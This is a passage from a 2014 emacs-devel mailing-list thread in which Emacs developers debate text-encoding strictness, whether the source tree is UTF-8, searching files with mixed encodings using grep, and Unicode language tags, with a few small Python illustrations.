> relevant sense since it has multiple encodings.
>
>  > and the vast majority of output fits it.  Then you want to have
>  > things displayed according to locale and have that stuff which
>  > doesn't fit formatted as some sort of recognizable escape sequence.
>
> For Paul's example, I suppose binary would work just fine, since he's
> searching for ASCII and Emacs sources are probably over 95% ASCII.
>
> And in *my* locale, the whole locale concept sucks because no matter
> what locale I choose somewhere between 1/3 and 2/3 of the text (all
> perfectly intelligible Japanese) will be unreadable according to that
> locale.

And 100% illegible is better?

> The real world is stranger and more dangerous than you imagine.

Apparently.

-- 
David Kastrup




* Re: Emacs Lisp's future
  2014-10-13 17:49                                                                           ` Stephen J. Turnbull
  2014-10-13 18:04                                                                             ` David Kastrup
@ 2014-10-13 19:19                                                                             ` Eli Zaretskii
  2014-10-14  7:03                                                                               ` Stephen J. Turnbull
  1 sibling, 1 reply; 261+ messages in thread
From: Eli Zaretskii @ 2014-10-13 19:19 UTC (permalink / raw)
  To: Stephen J. Turnbull; +Cc: dak, emacs-devel

> From: "Stephen J. Turnbull" <stephen@xemacs.org>
> Date: Tue, 14 Oct 2014 02:49:56 +0900
> Cc: emacs-devel@gnu.org
> 
> The Emacs source tree evidently doesn't *have* a locale in the
> relevant sense since it has multiple encodings.

That's not true: we try using UTF-8 wherever possible.  The few files
that don't use that simply cannot.  But they are a tiny minority.




* Re: Emacs Lisp's future
  2014-10-13  5:43                                                                   ` Eli Zaretskii
@ 2014-10-14  2:09                                                                     ` Richard Stallman
  2014-10-14  6:24                                                                       ` Eli Zaretskii
  0 siblings, 1 reply; 261+ messages in thread
From: Richard Stallman @ 2014-10-14  2:09 UTC (permalink / raw)
  To: Eli Zaretskii
  Cc: dak, mikegerwitz, mhw, dmantipov, emacs-devel, handa, monnier,
	stephen

[[[ To any NSA and FBI agents reading my email: please consider    ]]]
[[[ whether defending the US Constitution against all enemies,     ]]]
[[[ foreign or domestic, requires you to follow Snowden's example. ]]]

    That distinction is quite blurred in latest Emacs versions.  E.g.,
    shell-command-to-string might call a process on a remote host and
    communicate with it via open-network-stream or some such.  There are
    several interactive commands already that use this feature.

The cases where their arguments for strictness are strongest
are the noninteractive ones that don't show the text to a user
for editing.

-- 
Dr Richard Stallman
President, Free Software Foundation
51 Franklin St
Boston MA 02110
USA
www.fsf.org  www.gnu.org
Skype: No way! That's nonfree (freedom-denying) software.
  Use Ekiga or an ordinary phone call.





* Re: Emacs Lisp's future
  2014-10-13  5:35                                                                   ` Stephen J. Turnbull
  2014-10-13  6:02                                                                     ` Eli Zaretskii
  2014-10-13 14:55                                                                     ` Paul Eggert
@ 2014-10-14  2:11                                                                     ` Richard Stallman
  2 siblings, 0 replies; 261+ messages in thread
From: Richard Stallman @ 2014-10-14  2:11 UTC (permalink / raw)
  To: Stephen J. Turnbull
  Cc: dak, mikegerwitz, mhw, dmantipov, emacs-devel, handa, monnier,
	eliz

[[[ To any NSA and FBI agents reading my email: please consider    ]]]
[[[ whether defending the US Constitution against all enemies,     ]]]
[[[ foreign or domestic, requires you to follow Snowden's example. ]]]

    Speaking only for myself, no, I mean all octet streams purported to
    be encoded text, network or local.

We can't do that.  That would be intolerable for users, for the reasons
others have explained.

However, the examples people have offered mostly include working in
pipelines with network services.  Those cases involve noninteractive
processing and using the network.  It would be ok in those cases
to be more strict about decoding.

-- 
Dr Richard Stallman
President, Free Software Foundation
51 Franklin St
Boston MA 02110
USA
www.fsf.org  www.gnu.org
Skype: No way! That's nonfree (freedom-denying) software.
  Use Ekiga or an ordinary phone call.





* Re: Emacs Lisp's future
  2014-10-14  2:09                                                                     ` Richard Stallman
@ 2014-10-14  6:24                                                                       ` Eli Zaretskii
  2014-10-14  7:48                                                                         ` David Kastrup
  2014-10-15 13:16                                                                         ` Richard Stallman
  0 siblings, 2 replies; 261+ messages in thread
From: Eli Zaretskii @ 2014-10-14  6:24 UTC (permalink / raw)
  To: rms; +Cc: dak, mikegerwitz, mhw, dmantipov, emacs-devel, handa, monnier,
	stephen

> Date: Mon, 13 Oct 2014 22:09:37 -0400
> From: Richard Stallman <rms@gnu.org>
> CC: dak@gnu.org, mikegerwitz@gnu.org, mhw@netris.org,
> 	dmantipov@yandex.ru, emacs-devel@gnu.org, handa@gnu.org,
> 	monnier@iro.umontreal.ca, stephen@xemacs.org
> 
>     That distinction is quite blurred in latest Emacs versions.  E.g.,
>     shell-command-to-string might call a process on a remote host and
>     communicate with it via open-network-stream or some such.  There are
>     several interactive commands already that use this feature.
> 
> The cases where their arguments for strictness are strongest
> are the noninteractive ones that don't show the text to a user
> for editing.

I believe the commands that use shell-command-to-string are a good
example of these cases.  That function is frequently used as
infrastructure to query an external program about something, and the
result is then used, at least in some cases, to decide how to proceed.




* Re: Emacs Lisp's future
  2014-10-13 19:19                                                                             ` Eli Zaretskii
@ 2014-10-14  7:03                                                                               ` Stephen J. Turnbull
  2014-10-14  7:41                                                                                 ` Eli Zaretskii
  2014-10-14 20:03                                                                                 ` Paul Eggert
  0 siblings, 2 replies; 261+ messages in thread
From: Stephen J. Turnbull @ 2014-10-14  7:03 UTC (permalink / raw)
  To: Eli Zaretskii; +Cc: dak, emacs-devel

Eli Zaretskii writes:

 > That's not true: we try using UTF-8 wherever possible.  The few files
 > that don't use that simply cannot.

That doesn't seem to be true.  In fact many of the encodings
discovered by "grep -r -e '-\\*- coding:'" are ISO 2022 conformant, and
a few indeed appear to be EUC encodings under an alias (eg,
chinese-iso-8bit-unix).  AFAICS, the only encodings listed that can't
be encoded in UTF-8 are the Big 5 family -- and that's only if you
demand bug-compatibility.[1]

So "simply cannot" evidently is your way of saying "inconvenient".[2]

Note that because of multiple encodings, in the Emacs tree "grep -r"
is probably just a bug.  It's not that you can't read the foreign
languages in "wrong" encodings.  Rather, if your search key is in one
of those languages, you'll *miss occurrences* in the "wrong" encodings.
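
A minimal Python sketch of the miss, assuming a UTF-8 locale for the
search key and EUC-JP as the "wrong" encoding; the sample text is
invented for the example:

```python
key = "日本"                      # search key as typed in a UTF-8 locale
key_bytes = key.encode("utf-8")

utf8_file = "注: 日本語の説明\n".encode("utf-8")
euc_file = "注: 日本語の説明\n".encode("euc_jp")

# A byte-oriented search only sees the key's UTF-8 byte sequence.
found_in_utf8 = key_bytes in utf8_file
found_in_euc = key_bytes in euc_file

# Decoding the file with its own encoding first finds the occurrence.
found_after_decoding = key in euc_file.decode("euc_jp")
```

The search of the EUC-JP file comes back empty without any error, which
is what makes the bug hard to notice.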

With your preferred default, most users will live their whole lives
without recognizing the bug.  With a strict default, they have a
fighting chance of learning about it.

Footnotes: 
[1]  Big 5 contains a few duplicated characters (at different code
points), so *as text* those files can be represented in Unicode (no
text information is lost since the characters in question are
identical in all ways except Big 5 code point), although *as binary
files* they may not be roundtrippable to UTF-8 (it depends on which
code point is chosen for the duplicated character).

[2]  The inconvenience is pretty significant, here: you'd lose
diff'ability across the conversion boundary.  Thus only new files are
*required* to use UTF-8 (no diff discontinuity), and conversions of
existing files are presumably done only with great care, if at all.

Still, I would think the benefits of having these files be greppable
(and etags-able!) would outweigh that inconvenience in a very short
period of time (maybe a year?)  Except for documentation files, the
files that need these characters probably don't change much.





* Re: Emacs Lisp's future
  2014-10-14  7:03                                                                               ` Stephen J. Turnbull
@ 2014-10-14  7:41                                                                                 ` Eli Zaretskii
  2014-10-14  7:58                                                                                   ` Eli Zaretskii
  2014-10-14  8:34                                                                                   ` Stephen J. Turnbull
  2014-10-14 20:03                                                                                 ` Paul Eggert
  1 sibling, 2 replies; 261+ messages in thread
From: Eli Zaretskii @ 2014-10-14  7:41 UTC (permalink / raw)
  To: Stephen J. Turnbull; +Cc: dak, emacs-devel

> From: "Stephen J. Turnbull" <stephen@xemacs.org>
> Cc: dak@gnu.org,
>     emacs-devel@gnu.org
> Date: Tue, 14 Oct 2014 16:03:42 +0900
> 
> Eli Zaretskii writes:
> 
>  > That's not true: we try using UTF-8 wherever possible.  The few files
>  > that don't use that simply cannot.
> 
> That doesn't seem to be true.  In fact many of the encodings
> discovered by "grep -r -e '-\\*- coding:" are ISO 2022 conformant, and
> a few indeed appear to be EUC encodings under an alias (eg,
> chinese-iso-8bit-unix).  AFAICS, the only encodings listed that can't
> be encoded in UTF-8 are the Big 5 family -- and that's only if you
> demand bug-compatibility.[1]

First, you missed the file-local variables (the pattern you used with
Grep will only find the cookies on the first line).  Second, you
missed file-coding-system-alist, auto-coding-alist, and
auto-coding-regexp-alist, which set defaults for some files that
therefore no longer need to be explicitly stated in the file.

So please believe me when I say that the files encoded in anything
that isn't UTF-8 are those where using UTF-8 was impossible for some
specific reason (not the reasons you mention above).  You can look up
the related discussions in our list archives.

Btw, to find out how many of our files are in UTF-8 and how many
aren't, I would suggest using tools that can explicitly tell the
encoding, rather than relying on Grep and on whatever you remember are
the ways of specifying a file's encoding.
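
For example, a content-based tally could be sketched along these lines
in Python.  The classify function and the sample blobs are hypothetical
stand-ins; a real survey would read each file in binary mode.

```python
from collections import Counter

def classify(data: bytes) -> str:
    """Label a blob by content alone: 'ascii', 'utf-8', or 'other'."""
    try:
        data.decode("ascii")
        return "ascii"
    except UnicodeDecodeError:
        pass
    try:
        data.decode("utf-8")
        return "utf-8"
    except UnicodeDecodeError:
        return "other"

# Stand-ins for file contents, keyed by made-up file names.
samples = {
    "a.el": b"(message \"hello\")\n",
    "b.el": "(message \"héllo\")\n".encode("utf-8"),
    "c.el": "(message \"日本語\")\n".encode("euc_jp"),
}
tally = Counter(classify(blob) for blob in samples.values())
```

A check like this only says whether the bytes are valid UTF-8.  It does
not prove that UTF-8 was intended, and it cannot name the encoding of
the files that land in "other".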




* Re: Emacs Lisp's future
  2014-10-14  6:24                                                                       ` Eli Zaretskii
@ 2014-10-14  7:48                                                                         ` David Kastrup
  2014-10-15 13:16                                                                         ` Richard Stallman
  1 sibling, 0 replies; 261+ messages in thread
From: David Kastrup @ 2014-10-14  7:48 UTC (permalink / raw)
  To: Eli Zaretskii
  Cc: rms, mikegerwitz, mhw, dmantipov, emacs-devel, handa, monnier,
	stephen

Eli Zaretskii <eliz@gnu.org> writes:

>> Date: Mon, 13 Oct 2014 22:09:37 -0400
>> From: Richard Stallman <rms@gnu.org>
>> CC: dak@gnu.org, mikegerwitz@gnu.org, mhw@netris.org,
>> 	dmantipov@yandex.ru, emacs-devel@gnu.org, handa@gnu.org,
>> 	monnier@iro.umontreal.ca, stephen@xemacs.org
>> 
>>     That distinction is quite blurred in latest Emacs versions.  E.g.,
>>     shell-command-to-string might call a process on a remote host and
>>     communicate with it via open-network-stream or some such.  There are
>>     several interactive commands already that use this feature.
>> 
>> The cases where their arguments for strictness are strongest
>> are the noninteractive ones that don't show the text to a user
>> for editing.
>
> I believe the commands that use shell-command-to-string are a good
> example of these cases.  That function is frequently used as
> infrastructure to query an external program about something, and the
> result is then used, at least in some cases, to decide how to proceed.

And treating undecodable bytes differently from other input regarding
verification/sanitizing is going to make things more secure just how?
I should have thought that using several different mechanisms here is
going to increase rather than decrease the number of possible attack
vectors.  Or is the idea that any application is safe to be called as
long as we don't carry more than 200ml of liquids -- sorry, wrong
security theatre.

-- 
David Kastrup




* Re: Emacs Lisp's future
  2014-10-14  7:41                                                                                 ` Eli Zaretskii
@ 2014-10-14  7:58                                                                                   ` Eli Zaretskii
  2014-10-14 10:06                                                                                     ` Stephen J. Turnbull
  2014-10-14  8:34                                                                                   ` Stephen J. Turnbull
  1 sibling, 1 reply; 261+ messages in thread
From: Eli Zaretskii @ 2014-10-14  7:58 UTC (permalink / raw)
  To: stephen, dak; +Cc: emacs-devel

> Date: Tue, 14 Oct 2014 10:41:56 +0300
> From: Eli Zaretskii <eliz@gnu.org>
> Cc: dak@gnu.org, emacs-devel@gnu.org
> 
> So please believe me when I say that the files encoded in anything
> that isn't UTF-8 are those where using UTF-8 was impossible for some
> specific reason (not the reasons you mention above).  You can look up
> the related discussions in our list archives.

Here's the discussion I had in mind:

  http://lists.gnu.org/archive/html/bug-gnu-emacs/2013-03/msg00420.html





* Re: Emacs Lisp's future
  2014-10-14  7:41                                                                                 ` Eli Zaretskii
  2014-10-14  7:58                                                                                   ` Eli Zaretskii
@ 2014-10-14  8:34                                                                                   ` Stephen J. Turnbull
  2014-10-14  9:21                                                                                     ` Eli Zaretskii
  1 sibling, 1 reply; 261+ messages in thread
From: Stephen J. Turnbull @ 2014-10-14  8:34 UTC (permalink / raw)
  To: Eli Zaretskii; +Cc: dak, emacs-devel

Eli Zaretskii writes:

 > >  > That's not true: we try using UTF-8 wherever possible.  The few files
 > >  > that don't use that simply cannot.
 > > 
 > > That doesn't seem to be true.  In fact many of the encodings
 > > discovered by "grep -r -e '-\\*- coding:" are ISO 2022 conformant, and
 > > a few indeed appear to be EUC encodings under an alias (eg,
 > > chinese-iso-8bit-unix).  AFAICS, the only encodings listed that can't
 > > be encoded in UTF-8 are the Big 5 family -- and that's only if you
 > > demand bug-compatibility.[1]
 > 
 > First, you missed the file-local variables (the pattern you used with
 > Grep will only find the cookies on the first line).

So?  That's not a bug, since I only need to show existence of files
that use coding systems that *could* be translated to UTF-8 but
weren't.  I'm aware that not every file in a non-default encoding will
have such a cookie, and that the cookies may be mistaken, of course.

 > Btw, to find out how many of our files are in UTF-8 and how many
 > aren't, I would suggest to use tools that can explicitly tell the
 > encoding, rather than rely on Grep and on whatever you remember are
 > the ways of specifying a file's encoding.

Sure, but it's ironic that *you* are saying that to *me*, when you're
on the side saying that if you get the wrong encoding somehow you want
rawbytes.  Shouldn't you use tools that can explicitly tell you the
encoding? ;-)






* Re: Emacs Lisp's future
  2014-10-14  8:34                                                                                   ` Stephen J. Turnbull
@ 2014-10-14  9:21                                                                                     ` Eli Zaretskii
  0 siblings, 0 replies; 261+ messages in thread
From: Eli Zaretskii @ 2014-10-14  9:21 UTC (permalink / raw)
  To: Stephen J. Turnbull; +Cc: dak, emacs-devel

> From: "Stephen J. Turnbull" <stephen@xemacs.org>
> Cc: dak@gnu.org,
>     emacs-devel@gnu.org
> Date: Tue, 14 Oct 2014 17:34:38 +0900
> 
> Eli Zaretskii writes:
> 
>  > >  > That's not true: we try using UTF-8 wherever possible.  The few files
>  > >  > that don't use that simply cannot.
>  > > 
>  > > That doesn't seem to be true.  In fact many of the encodings
>  > > discovered by "grep -r -e '-\\*- coding:" are ISO 2022 conformant, and
>  > > a few indeed appear to be EUC encodings under an alias (eg,
>  > > chinese-iso-8bit-unix).  AFAICS, the only encodings listed that can't
>  > > be encoded in UTF-8 are the Big 5 family -- and that's only if you
>  > > demand bug-compatibility.[1]
>  > 
>  > First, you missed the file-local variables (the pattern you used with
>  > Grep will only find the cookies on the first line).
> 
> So?  That's not a bug, since I only need to show existence of files
> that use coding systems that *could* be translated to UTF-8 but
> weren't.

My original statement was that we try using UTF-8 "whenever possible".
I didn't define "possible", but the discussion to which I pointed has
the necessary details for that.

I also said that the non-UTF-8 files are a minority; for that,
counting the UTF-8 encoded files without missing any, no matter how
their encoding is determined, is important.

>  > Btw, to find out how many of our files are in UTF-8 and how many
>  > aren't, I would suggest to use tools that can explicitly tell the
>  > encoding, rather than rely on Grep and on whatever you remember are
>  > the ways of specifying a file's encoding.
> 
> Sure, but it's ironic that *you* are saying that to *me*, when you're
> on the side saying that if you get the wrong encoding somehow you want
> rawbytes.  Shouldn't you use tools that can explicitly tell you the
> encoding? ;-)

Irrelevant.  The issue to which you responded was whether the majority
of files in the Emacs repository use a certain encoding, which would
thus constitute a kind of "de-facto locale" for Emacs files.



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-14  7:58                                                                                   ` Eli Zaretskii
@ 2014-10-14 10:06                                                                                     ` Stephen J. Turnbull
  0 siblings, 0 replies; 261+ messages in thread
From: Stephen J. Turnbull @ 2014-10-14 10:06 UTC (permalink / raw)
  To: Eli Zaretskii; +Cc: dak, emacs-devel

Eli Zaretskii writes:

 > Here's the discussion I had in mind:
 > 
 >   http://lists.gnu.org/archive/html/bug-gnu-emacs/2013-03/msg00420.html

Oh, that's rich:

    The same can be said for etc/tutorials/TUTORIAL.ja.  This file
    should be shown in a proper Japanese font even for a user not in
    Japanese lang. env.

With all due respect, Dr. Handa, that is quite ironic.  You know as
well as I do what every Japanese textbook does to Chinese poetry.

Technically speaking, this kind of font choice is better done with
metadata.  For example, the user's default fonts might not make a
clear distinction among the different styles, or might be very
unrepresentative of one or more languages' typical style.  The fact
that Emacs *can* do it based on character set is kinda silly nowadays
because *nobody else* does.  The effort would be better spent on
improving CSS support.

And this again is amusing:

CJK variety: GB(元气,开发), BIG5(元氣,開發), JIS(元気,開発), KSC(元氣,開發)

I know[1] that there are consistent font style differences between
each pair of coding systems above, and those are nice to have.  But
what is funny is that *mostly those are not glyph differences in the
same character across languages, those are different characters in
Unicode!*  (Those are not 4 characters represented in 4 different
coding systems: there are at least 8 different characters involved.
And all but 2 of them are in fact representable in that venerable
subset of the Japanese standard, JIS X 0208.)

So, yes, I suppose that there are minor technical issues (I note that
TUTORIAL.ja didn't round-trip -- which is odd, and "CJK variety"
obviously can't).  But the assertions that these files "shouldn't" be
converted to UTF-8 because the differences "cannot" be represented in
UTF-8 are primarily artistic, and a point of view with which many
users differ.  (Besides the practice of the Japanese Ministry of
Education, Culture, etc, mentioned above, my Chinese students often
prefer to use Chinese fonts for their Japanese papers because they are
"more readable", for example -- of course, they need to fix that when
they hand them in to Japanese professors, who find the Chinese fonts
"unreadable" -- and so it goes.)


Footnotes: 
[1]  I'm working in a TTY so I can't see them at the moment.





^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-14  7:03                                                                               ` Stephen J. Turnbull
  2014-10-14  7:41                                                                                 ` Eli Zaretskii
@ 2014-10-14 20:03                                                                                 ` Paul Eggert
  2014-10-15  3:07                                                                                   ` Stephen J. Turnbull
  1 sibling, 1 reply; 261+ messages in thread
From: Paul Eggert @ 2014-10-14 20:03 UTC (permalink / raw)
  To: Stephen J. Turnbull, Eli Zaretskii; +Cc: emacs-devel

On 10/14/2014 12:03 AM, Stephen J. Turnbull wrote:
> in the Emacs tree "grep -r"
> is probably just a bug.

Although "grep -r" doesn't conform to POSIX, it is a handy GNU extension, 
and I use it a lot, both in the Emacs source tree and elsewhere.  GNU 
grep works reasonably well even with text files in the "wrong" encoding, 
and even with non-text files.  I don't expect grep to match UTF-8 
patterns to the corresponding EUC-JP text, because I know it doesn't 
translate.
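
The point about grep not translating can be seen at the byte level.  The
following Python sketch is an illustration only (the sample sentence and
variable names are made up): a byte-oriented search with a UTF-8 pattern
finds the text in a UTF-8 file but not in an EUC-JP file containing the
same characters, unless the file is decoded first.

```python
# Pattern as it would arrive from a UTF-8 terminal.
needle = "元気".encode("utf-8")

# The same Japanese sentence stored in two different encodings.
haystack_utf8 = "お元気ですか".encode("utf-8")
haystack_eucjp = "お元気ですか".encode("euc_jp")

# Byte-level search, which is what a non-translating tool does.
found_in_utf8 = needle in haystack_utf8
found_in_eucjp = needle in haystack_eucjp

# Searching after decoding with the right codec finds the text again.
found_after_decoding = "元気" in haystack_eucjp.decode("euc_jp")

print(found_in_utf8, found_in_eucjp, found_after_decoding)
```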

Emacs's M-x grep command supports this usage well, and I don't see how 
it would be an improvement to call this usage a "bug" or for the Emacs 
(or grep) default to insist on strict coding correctness here.

Eli is correct that UTF-8 is the encoding typically used for text in the 
Emacs source code.  For more about this, please see "Source file 
encoding" in admin/notes/unicode.



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-14 20:03                                                                                 ` Paul Eggert
@ 2014-10-15  3:07                                                                                   ` Stephen J. Turnbull
  2014-10-15  5:54                                                                                     ` Paul Eggert
  0 siblings, 1 reply; 261+ messages in thread
From: Stephen J. Turnbull @ 2014-10-15  3:07 UTC (permalink / raw)
  To: Paul Eggert; +Cc: Eli Zaretskii, emacs-devel

Paul Eggert writes:
 > On 10/14/2014 12:03 AM, Stephen J. Turnbull wrote:
 > > in the Emacs tree "grep -r"
 > > is probably just a bug.
 > 
 > Although "grep -r" doesn't conform to POSIX, it is a handy GNU extension, 

It's not a question of conformance, it's a question of GIGO.  As you
yourself know:

 > grep works reasonably well even with text files in the "wrong" encoding, 
 > and even with non-text files.  I don't expect grep to match UTF-8 
 > patterns to the corresponding EUC-JP text, because I know it doesn't 
 > translate.

Oh, so you intentionally chose an example where you know it works, and
published that on a public mailing list, without warning the kids not
to try it at home?  Do you realize that although all Japanese computer
users occasionally experience mojibake, only a few understand the
mechanism and its implications for "simple" operations like grep?  I
suppose that goes in spades for the Chinese.  Consider searching for
元気 to find HELLO, "knowing" that Emacs uses the UTF-8 encoding!

 > Emacs's M-x grep command supports this usage well, and I don't see how 
 > it would be an improvement to call this usage a "bug" or for the Emacs 
 > (or grep) default to insist on strict coding correctness here.

Ah, so you've never lived anywhere but Kansas, Dorothy?  There are 1.5
billion[1] Asians who disagree that "grep -r しまった" is well-
supported by Emacs or grep in an environment with multiple encodings,
which is most of them (except where they've consciously instituted a
program of converting legacy documents to a common encoding).  That's
why the "Japanese patch" is also "the patch that would not die".

But that patch is not in any mainline program that I know of, because
accurate auto-detection requires knowledge of the target language so
it doesn't generalize (the "Japanese patch" assumes that the language
is Japanese, so it must be facing ISO-2022-JP, Shift-JIS, or EUC-JP,
and relatively recent versions added UTF-8 and BOM detection to that).
The patch is not able to distinguish EUC-JP from EUC-CN, for example,
in typical use where the designation of character sets to registers
is implicit.  (Distinguishing Shift-JIS from Big5 is highly but not
100% reliable, and of course distinguishing the language variants of
ISO-2022-7 is trivial because the control sequences specify character
sets to be installed in the GL register.)
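
The EUC-JP versus EUC-CN ambiguity can be shown with a short Python
sketch (an illustration only; it uses Python's "euc_jp" and "gb2312"
codecs as stand-ins for the two encodings).  The same byte string
decodes without error under both, so validity alone cannot tell them
apart; only knowledge of the expected language can.

```python
# Two kanji encoded as EUC-JP.
data = "元気".encode("euc_jp")

# Both decodes succeed, because the two encodings share the same
# two-byte structure and differ only in which character set is assumed.
as_japanese = data.decode("euc_jp")
as_chinese = data.decode("gb2312")

print(as_japanese, as_chinese)
```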

 > Eli is correct that UTF-8 is the encoding typically used for text
 > in the Emacs source code.  For more about this, please see "Source
 > file encoding" in admin/notes/unicode.

XEmacs made that decision in 1998 (only using ISO-2022-JP).  I know
how this works.  The only difference between us is that I live in
Tsukuba, and I've spoken to Handa and Tomita inter alia about these
issues over beers (in Japanese as well as in English), and I've read
the extremist anti-Unicode tirades (in Japanese).  I don't know *why*
Dr. Handa sides with those maniacs (they claim that JIS incorporates a
mystic Yamato-damashii = "authentic Japanese spirit") although I
believe it's out of a genuine desire to support multiculturalism (via
his specialty of developing multilingual software).

However, like the Japanese patch, detecting culture and choosing font
for the same repertoire via encoding is a limited technique.  It only
works well for Han-using languages.  For example, the northern
European countries have different notions about positioning of
accents, which is apparently noticeable to non-native speakers with
umlauts.  I suspect (though I haven't asked and don't have time to
search the library for worldwide newspapers) that the various
English-speaking cultures, the French, the Spanish, the Italians, and
the Germans have different notions of what constitutes readable or
beautiful typography -- it's definitely the case that the ASCII
characters in Japanese fonts "look Japanese" (to me, anyway).  But
good luck choosing fonts based on distinguishing ISO-8859-1 from
ISO-8859-1! :-)

Dr. Handa's approach to multiculturalism, then, is fundamentally
different from that of the engineers and scholars who have evolved
Unicode (more precisely, universal coded character sets and the
related encoding mechanisms) over the last 30 years or so, not to
forget the W3C which has concluded that (as long as conventional
glyphs are available for the character repertoire) font choice is
purely a presentation issue, and should be handled by markup.  Unicode
has even deprecated the use of "language tag" characters.  They do
remain in the repertoire, so could be used to deal with the issues
we are discussing.

http://www.unicode.org/faq/languagetagging.html
http://www.unicode.org/versions/Unicode6.2.0/ch16.pdf#G26419

Note that the language tags are isomorphic to control sequences as
used in ISO 2022 (except that being encoded in a block disjoint from
graphic characters, they're harder to screw up), so they introduce no
text handling issues for Emacs not already present in encodings using
ISO 2022 extension techniques.
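
For reference, a language tag is the LANGUAGE TAG character U+E0001
followed by tag characters that mirror ASCII at an offset of U+E0000.
The Python sketch below is an illustration only; the helper names are
hypothetical and it is not a proposal for how Emacs should handle tags.

```python
LANGUAGE_TAG = "\U000E0001"  # U+E0001 LANGUAGE TAG
TAG_OFFSET = 0xE0000         # tag characters mirror ASCII at this offset


def language_tag(lang: str) -> str:
    """Build a Plane 14 tag sequence for an ASCII language code."""
    if not all(0x20 <= ord(c) <= 0x7E for c in lang):
        raise ValueError("language code must be printable ASCII")
    return LANGUAGE_TAG + "".join(chr(TAG_OFFSET + ord(c)) for c in lang)


def strip_tags(text: str) -> str:
    """Remove every character in the tag block U+E0000..U+E007F."""
    return "".join(c for c in text if not 0xE0000 <= ord(c) <= 0xE007F)


tagged = language_tag("ja") + "元気"
print(len(tagged), strip_tags(tagged))
```

Because the tag block is disjoint from graphic characters, stripping the
tags needs only a range check.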

So there you have it.  There is *no barrier* to converting *all* files
to conformant UTF-8, except a couple hours' hacking to make
`help-with-tutorial' and `view-hello-file' recognize language tags.[2]
It might be preferable to use a different approach, more conformant to
the Unicode/W3C party line, though.

Thank you for your persistence.  This discussion will greatly inform
my future work in XEmacs.  (I'm done discussing the issue for Emacs,
because I don't expect Dr. Handa -- who is more expert than I -- to
change his approach after all these years.  This is all just IMHO FWIW
YMMV -- and I suspect Dr. Handa counts his "mileage" in kilometers. ;-)



Footnotes: 
[1]  I don't know about Indic languages.  I'm under the impression
that these days they almost universally use Unicode in preference to
ISCII and such-like, so they may not have the issue.  If that is
incorrect, then you can make that 2.5 billion Asians.

[2]  Note that the limitation of the hack to those functions only is
consistent with the Unicode-recommended usage of language tags.





^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-15  3:07                                                                                   ` Stephen J. Turnbull
@ 2014-10-15  5:54                                                                                     ` Paul Eggert
  2014-10-15  7:17                                                                                       ` Stephen J. Turnbull
  0 siblings, 1 reply; 261+ messages in thread
From: Paul Eggert @ 2014-10-15  5:54 UTC (permalink / raw)
  To: Stephen J. Turnbull; +Cc: Eli Zaretskii, emacs-devel

Stephen J. Turnbull wrote:
> you intentionally chose an example where you know it works, and
> published that on a public mailing list, without warning the kids not
> to try it at home?

It's perfectly fine for users to try "M-x grep -r" at home.  It's not going to 
hurt them.  It's a common idiom, and lots of people use it every day.

> There is *no barrier* to converting *all* files
> to conformant UTF-8, except a couple hours' hacking to make
> `help-with-tutorial' and `view-hello-file' recognize language tags.

I already proposed that for most files, and nobody opposed the idea; see 
<http://bugs.gnu.org/13936#29>.  It's just that nobody has found the "couple 
hours'" hacking time.  Although it's low on my priority list, evidently it's 
higher on yours; perhaps you can propose a patch?  It's not a big deal if you 
can't; I expect eventually someone will get around to it.

> Ah, so you've never lived anywhere but Kansas, Dorothy?

I'm well aware of all the problems you mentioned.  None of them are valid 
arguments that it's a "bug" to use "grep -r" in the Emacs source directory. 
Conversely, it appears that you did not read the file admin/notes/unicode 
carefully; if you had, you would not be asserting so blithely that there is "no 
barrier" to converting all Emacs source files to UTF-8.



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-15  5:54                                                                                     ` Paul Eggert
@ 2014-10-15  7:17                                                                                       ` Stephen J. Turnbull
  2014-10-15  9:20                                                                                         ` Eli Zaretskii
  2014-10-15 17:18                                                                                         ` Paul Eggert
  0 siblings, 2 replies; 261+ messages in thread
From: Stephen J. Turnbull @ 2014-10-15  7:17 UTC (permalink / raw)
  To: Paul Eggert; +Cc: Eli Zaretskii, emacs-devel

Paul Eggert writes:

 > It's perfectly fine for users to try "M-x grep -r" at home.  It's
 > not going to hurt them.

That's true for "hurt" == "must call 911".  There are very few
computer applications where bugs can result in 911 calls, though.
That's an awfully low quality standard you have there.

 > It's a common idiom, and lots of people use it every day.

Because they're monolingual English speakers, they can.  Others
cannot, unless they have an environment where there is a common coded
character set used for all textual content.  Even an American
searching for all instances of the CENT SIGN would be subject to
this bug.

http://www.thecomicstrips.com/store/add.php?iid=83467

 > Conversely, it appears that you did not read the file
 > admin/notes/unicode carefully;

"It appears that you have not studied Unicode carefully", as there is
nothing in that file that suggests anything but work is involved in a
conversion that loses no character information, since the external
coding system utf-8-emacs is available.  Even that can be dispensed
with, and pure Unicode used, with a little more work (use the PUA,
that's what it is there for!)

The metadata (language, for which original coded character set is a
proxy) can be provided either with a markup language (eg, XML or even
HTML) or using Plane 14 tags (but I wrote that already).

 > if you had, you would not be asserting so blithely that there is
 > "no barrier" to converting all Emacs source files to UTF-8.

I stand corrected.  No *technical* barrier.  It does require
nontrivial work: simply filtering through iconv is not enough.

There's also a political barrier: I believe that characters are
characters, and may be shared across traditional character set
boundaries, and that the presentation layer should specify
presentation.  Dr. Handa prefers that presentation be encoded in the
content.  I have no stomach for that argument.



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-15  7:17                                                                                       ` Stephen J. Turnbull
@ 2014-10-15  9:20                                                                                         ` Eli Zaretskii
  2014-10-15 11:34                                                                                           ` Stephen J. Turnbull
  2014-10-15 17:18                                                                                         ` Paul Eggert
  1 sibling, 1 reply; 261+ messages in thread
From: Eli Zaretskii @ 2014-10-15  9:20 UTC (permalink / raw)
  To: Stephen J. Turnbull; +Cc: eggert, emacs-devel

> From: "Stephen J. Turnbull" <stephen@xemacs.org>
> Cc: Eli Zaretskii <eliz@gnu.org>,
>     emacs-devel@gnu.org
> Date: Wed, 15 Oct 2014 16:17:52 +0900
> 
>  > Conversely, it appears that you did not read the file
>  > admin/notes/unicode carefully;
> 
> "It appears that you have not studied Unicode carefully", as there is
> nothing in that file that suggests anything but work is involved in a
> conversion that loses no character information, since the external
> coding system utf-8-emacs is available.  Even that can be dispensed
> with, and pure Unicode used, with a little more work (use the PUA,
